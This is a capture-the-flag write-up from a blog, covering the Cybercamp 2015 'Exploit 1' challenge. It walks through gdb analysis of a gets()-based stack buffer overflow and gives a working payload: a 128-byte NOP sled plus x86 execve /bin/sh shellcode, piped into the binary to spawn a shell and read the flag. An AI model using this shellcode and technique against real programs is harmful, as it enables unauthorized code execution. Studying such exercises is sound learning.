Hey, im newboy, nice to meet you!
Tell me, who am I speaking to? 0x90r00t
My pleasure, 0x90r00t 🙂
We start debug to find the size of the stack allocated :
0x08048469: sub esp,0x94 (gdb) p/d 0x94 = 148
We know our buffer is less than 148 bytes.
0x080484ab <+80>: lea eax,[ebp-0x95] 0x080484b1 <+86>: push eax 0x080484b2 <+87>: call 0x8048320 <gets@plt>
Here the program stores the $name in ebp-0x95. The program gets the name with insecure method at 0x080484b2 and stores it in ebp-0x95 as seen previously, then calls EAX
0x080484ba <+95>: lea eax,[ebp-0x15] 0x080484bd <+98>: call eax
EAX contains EBP-0x15 value. We want to place some shellcode here to spawn a shell. This can be done with our buffer overflow.
To determine the buffer size of the $name var needed to overflow, we need to determine the size beetween the adress ebp-0x95 (buffer starting address) and the adress called by EAX (ebp-0x15).
(gdb) p $ebp-0x15 = 0xbffff483 (gdb) p $ebp-0x95 = 0xbffff403 (gdb) p/d 0xbffff483 - 0xbffff403 = 128
So our buffer have a 128 bytes size. We can overflow the 0xbffff483 address with the get() at 0x080484b2. In order to verify our analyze we set a breakpoint on “call 0x8048320 <gets@plt>” located at 0x080484b2 :
(gdb) b *0x080484b2
We start the debug to overwrite ebp-0x15 that will be called by “0x080484bd <+98>: call eax”
(gdb) run <<< $(python -c 'print "\x90"*128 + "AAAA"')
At this moment the program doesn’t store yet our string given in argument, to verify we check the value of ebp-0x15 :
(gdb) x/xw 0xbffff483 0xbffff483: 0xccccccc3
Not yet overflowed. We go to the next instruction to verify if the overflow succeeded
(gdb) n (gdb) x/xw 0xbffff483 0xbffff483: 0x41414141
=> Overflowed by our string !
So we can inject shellcode here by replacing AAAA by our shellcode :
(gdb) run <<< $(python -c 'print "\x90"*128 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"') process 4314 is executing new program: /bin/dash
So let’s go to try in real :
$ python -c 'print "\x90"*128 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"' | ./newboy
=> No segfault but shell closed directly.
We force the shell to wait command with cat :
$ (python -c 'print "\x90"*128 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"' && cat) | ./newboy
-> Access granted
cat flag.txt e50bb99725defaa4d275d09cd829440657741e7a674d757c0120158d552011fd
Thanks for reading !
2 thoughts on “[Cybercamp 2015] [Exploit 1] Write Up”
It challenges still online, or it have repository on github
I added a link to the binary in the post 🙂